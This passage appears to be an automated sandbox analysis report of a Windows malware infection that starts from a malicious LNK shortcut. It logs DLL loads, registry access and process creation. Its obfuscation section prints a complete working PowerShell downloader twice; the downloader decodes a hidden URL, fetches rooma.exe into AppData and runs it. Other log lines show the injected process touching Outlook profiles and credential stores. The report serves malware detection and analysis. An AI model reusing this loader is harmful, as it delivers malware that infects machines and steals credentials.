          Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winsqlite3.dllJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: vaultcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
          Source: Offer Document 24.lnkLNK file: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: TmjHHkXnMrncRmISMzN.exe, 00000009.00000000.1509569142.000000000093E000.00000002.00000001.01000000.0000000F.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3835791567.000000000093E000.00000002.00000001.01000000.0000000F.sdmp
          Source: Binary string: wntdll.pdbUGP source: rooma.exe, 00000007.00000003.1492774840.00000000013AE000.00000004.00000020.00020000.00000000.sdmp, rooma.exe, 00000007.00000002.1604431863.00000000016FE000.00000040.00001000.00020000.00000000.sdmp, rooma.exe, 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, rooma.exe, 00000007.00000003.1490722054.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1606101390.0000000002D06000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1604040485.0000000002B16000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: rooma.exe, rooma.exe, 00000007.00000003.1492774840.00000000013AE000.00000004.00000020.00020000.00000000.sdmp, rooma.exe, 00000007.00000002.1604431863.00000000016FE000.00000040.00001000.00020000.00000000.sdmp, rooma.exe, 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, rooma.exe, 00000007.00000003.1490722054.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1606101390.0000000002D06000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1604040485.0000000002B16000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: netbtugc.pdb source: rooma.exe, 00000007.00000003.1572934772.000000000101D000.00000004.00000020.00020000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 00000009.00000002.3835614650.0000000000E38000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: netbtugc.pdbGCTL source: rooma.exe, 00000007.00000003.1572934772.000000000101D000.00000004.00000020.00020000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 00000009.00000002.3835614650.0000000000E38000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LQhlh($iAXOUnjQ, $bjGcHEb){[IO.File]::WriteAllBytes($iAXOUnjQ, $bjGcHEb)};function zkkoODnkdOXlr($iAXOUnjQ){if($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47179,47187,47187))) -eq $True){rundll32.exe $iAXOUnjQ }elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47191,47194,47128))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $iAXOUnjQ}elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47188,47194,47184))) -eq $True){misexec /qn /i $iAXOUnjQ}else{Start-Process $iAXOUnjQ}};function fbUysIvJpUzDJbgt($WeuPtAwBrGuTyyLeSBEJ){$TPKepUYDmoAFjOHRfuEf = New-Object (KgQIevZJx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$bjGcHEb = $TPKepUYDmoAFjOHRfuEf.DownloadData($WeuPtAwBrGuTyyLeSBEJ);return $bjGcHEb};function KgQIevZJx($eTHmOcKqIU){$kIWXaGUQZYbt=47079;$PDFpjjruzXwZezIX=$Null;foreach($QNJiuRDs in $eTHmOcKqIU){$PDFpjjruzXwZezIX+=[char]($QNJiuRDs-$kIWXaGUQZYbt)};return $PDFpjjruzXwZezIX};function iMoBwPUgEkDDhYs(){$bzNVNMxsa = $env:AppData + '\';$fLaod = $bzNVNMxsa + 'rooma.exe'; if (Test-Path -Path $fLaod){zkkoODnkdOXlr $fLaod;}Else{ $movKnuBo = fbUysIvJpUzDJbgt (KgQIevZJx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,47125,47129,47129,47130,47126,47193,47190,47190,47188,47126,47193,47190,47190,47188,47176,47125,47180,47199,47180));LQhlh $fLaod $movKnuBo;zkkoODnkdOXlr $fLaod;};;;;}iMoBwPUgEkDDhYs;
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LQhlh($iAXOUnjQ, $bjGcHEb){[IO.File]::WriteAllBytes($iAXOUnjQ, $bjGcHEb)};function zkkoODnkdOXlr($iAXOUnjQ){if($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47179,47187,47187))) -eq $True){rundll32.exe $iAXOUnjQ }elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47191,47194,47128))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $iAXOUnjQ}elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47188,47194,47184))) -eq $True){misexec /qn /i $iAXOUnjQ}else{Start-Process $iAXOUnjQ}};function fbUysIvJpUzDJbgt($WeuPtAwBrGuTyyLeSBEJ){$TPKepUYDmoAFjOHRfuEf = New-Object (KgQIevZJx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$bjGcHEb = $TPKepUYDmoAFjOHRfuEf.DownloadData($WeuPtAwBrGuTyyLeSBEJ);return $bjGcHEb};function KgQIevZJx($eTHmOcKqIU){$kIWXaGUQZYbt=47079;$PDFpjjruzXwZezIX=$Null;foreach($QNJiuRDs in $eTHmOcKqIU){$PDFpjjruzXwZezIX+=[char]($QNJiuRDs-$kIWXaGUQZYbt)};return $PDFpjjruzXwZezIX};function iMoBwPUgEkDDhYs(){$bzNVNMxsa = $env:AppData + '\';$fLaod = $bzNVNMxsa + 'rooma.exe'; if (Test-Path -Path $fLaod){zkkoODnkdOXlr $fLaod;}Else{ $movKnuBo = fbUysIvJpUzDJbgt (KgQIevZJx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,47125,47129,47129,47130,47126,47193,47190,47190,47188,47126,47193,47190,47190,47188,47176,47125,47180,47199,47180));LQhlh $fLaod $movKnuBo;zkkoODnkdOXlr $fLaod;};;;;}iMoBwPUgEkDDhYs;Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFB4A342DEB push ecx; rep ret 5_2_00007FFB4A342DEC
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_009B48A9 push esp; ret 7_2_009B48AA
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_009CE2BA push 00000038h; iretd 7_2_009CE2BE
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_009C8C92 pushad ; retf 7_2_009C8C93
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_009CA436 push ebx; iretd 7_2_009CA600
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_009CA5D9 push ebx; iretd 7_2_009CA600
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_009B3780 push eax; ret 7_2_009B3782
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_009C47A2 push es; iretd 7_2_009C47AA
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_009B17E5 push ebp; retf 003Fh7_2_009B17E6
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015909AD push ecx; mov dword ptr [esp], ecx7_2_015909B6
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeCode function: 9_2_04AC9E05 push esp; ret 9_2_04AC9E06
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeCode function: 9_2_04AE3816 push 00000038h; iretd 9_2_04AE381A
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeCode function: 9_2_04ADF992 push ebx; iretd 9_2_04ADFB5C
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeCode function: 9_2_04ADE1EE pushad ; retf 9_2_04ADE1EF
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeCode function: 9_2_04ADDB88 push ebx; ret 9_2_04ADDB89
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeCode function: 9_2_04AE8BD4 push FFFFFFBAh; ret 9_2_04AE8BD6
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeCode function: 9_2_04ADFB35 push ebx; iretd 9_2_04ADFB5C
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02EE09AD push ecx; mov dword ptr [esp], ecx10_2_02EE09B6
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02562238 pushad ; iretd 10_2_02562239
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0256101F push es; iretd 10_2_02561027
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02551126 push esp; ret 10_2_02551127
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0256D1B0 push es; ret 10_2_0256D1D0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0256550F pushad ; retf 10_2_02565510
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0256AB37 push 00000038h; iretd 10_2_0256AB3B
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02566E56 push ebx; iretd 10_2_02566E7D
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0256FEF5 push FFFFFFBAh; ret 10_2_0256FEF7
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02560EAB push ebp; retf 10_2_02560EAC
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0255FFA0 push esi; iretd 10_2_0255FFA5
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02566CB3 push ebx; iretd 10_2_02566E7D
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeCode function: 14_2_023A7A15 push eax; retf 14_2_023A7A14
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeCode function: 14_2_023B2A5A push esi; iretd 14_2_023B2A5F
          Source: rooma.exe.5.drStatic PE information: section name: .text entropy: 7.994482090735877

          Persistence and Installation Behavior

          barindex
          Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
          Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior
          Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\rooma.exeJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
